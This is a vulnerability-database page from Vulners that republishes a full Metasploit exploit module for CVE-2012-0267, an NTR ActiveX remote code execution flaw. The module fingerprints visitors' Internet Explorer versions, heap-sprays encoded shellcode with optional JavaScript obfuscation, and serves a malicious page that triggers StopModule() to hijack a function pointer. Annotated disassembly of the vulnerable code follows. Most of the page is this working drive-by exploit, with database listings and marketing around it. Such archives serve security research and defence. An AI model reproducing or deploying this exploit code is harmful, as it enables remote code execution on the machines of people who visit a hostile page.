Vulners
Lucene search
NTR ActiveX Control StopModule() Remote Code Execution
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2012-0267 | 10 Oct 201200:00 | – | circl |
 | NTR ActiveX Control StopModule() Remote Code Execution (CVE-2012-0267) | 20 Aug 201300:00 | – | checkpoint_advisories |
 | CVE-2012-0267 | 15 Jan 201202:00 | – | cve |
 | CVE-2012-0267 | 15 Jan 201202:00 | – | cvelist |
 | NTR - ActiveX Control 'StopModule()' Remote Code Execution (Metasploit) | 10 Oct 201200:00 | – | exploitdb |
 | NTR ActiveX Control StopModule() Remote Code Execution | 20 Sep 201217:02 | – | metasploit |
 | NTR ActiveX Control < 2.0.4.8 Multiple Vulnerabilities | 16 Jan 201200:00 | – | nessus |
 | CVE-2012-0267 | 15 Jan 201203:55 | – | nvd |
 | NTR ActiveX Control StopModule() Remote Code Execution | 22 Sep 201200:00 | – | packetstorm |
 | Null pointer dereference | 15 Jan 201203:55 | – | prion |
10
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "7.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:classid => "{E6ACF817-0A85-4EBE-9F0A-096C6488CFEA}",
:method => "StopModule",
:rank => NormalRanking
})
def initialize(info = {})
super(update_info(info,
'Name' => 'NTR ActiveX Control StopModule() Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The
vulnerability exists in the StopModule() method, where the lModule parameter is
used to dereference memory to get a function pointer, which leads to code execution
under the context of the user visiting a malicious web page.
},
'Author' =>
[
'Carsten Eiram', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0267' ],
[ 'OSVDB', '78253' ],
[ 'BID', '51374' ],
[ 'URL', 'http://secunia.com/secunia_research/2012-2/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => ""
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
# NTR ActiveX 1.1.8.0
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4'} ]
],
'Privileged' => false,
'DisclosureDate' => 'Jan 11 2012',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class
)
end
def get_spray(t, js_code, js_nops)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 500; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[3] #IE 7 on Windows Vista SP2
else
return nil
end
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
print_status("User-agent: #{agent}")
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have a setup we're targeting
if my_target.nil?
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js = get_spray(my_target, js_code, js_nops)
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
address = 0x0c0c0c0c / 0x134
html = <<-MYHTML
<html>
<body>
<object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='test'></object>
<script>
#{js}
test.StopModule(#{address});
</script>
</body>
</html>
MYHTML
html = html.gsub(/^\t\t/, '')
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
=begin
The pointer is "controlled" here:
.text:10004449 mov eax, [ebp+arg_0] ; arg_0 is user controlled
.text:1000444C imul eax, 134h ; it looks good
.text:10004452 lea esi, [eax+edi] ; eax is user controlled
.text:10004452 ; edi is a heap pointer initialized while activex loading
.text:10004452 ; (Important note: the default heap isn't being used)
.text:10004452 ;
.text:10004452 ; edi:
.text:10004452 ;
.text:10004452 ; 0:000> !heap -p -a edi
.text:10004452 ; address 01fb370c found in
.text:10004452 ; _HEAP @ 1fb0000
.text:10004452 ; HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
.text:10004452 ; 01fb3668 0373 0000 [01] 01fb3670 01b90 - (busy)
.text:10004452 ; ? ntractivex118!DllUnregisterServer+10d18
.text:10004452 ;
.text:10004452 ; Initialization (while activex loading):
.text:10004452 ; ChildEBP RetAddr Args to Child
.text:10004452 ; 00138510 02a4e147 00001b84 02a4e8fb 00001b84 ntdll!RtlAllocateHeap+0xeac
.text:10004452 ; 00138548 02a4939e 00000000 7dc43038 00e057f8 ntractivex118!DllUnregisterServer+0x8823
.text:10004452 ; 0013855c 7dea5401 02093628 00000000 7dc43038 ntractivex118!DllUnregisterServer+0x3a7a
.text:10004452 ; 00138598 7deaa7f8 00e057f8 00e06154 80004005 mshtml!COleSite::InstantiateObjectFromCF+0x114
And user to get RCE here:
.text:1000446E mov eax, [esi+24h] ; esi can be user influenced
.text:10004471 test eax, eax
.text:10004473 jz short loc_10004477
.text:10004475 call eax ; RCE!
=end
# 0day.today [2018-04-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Sep 2012 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.73275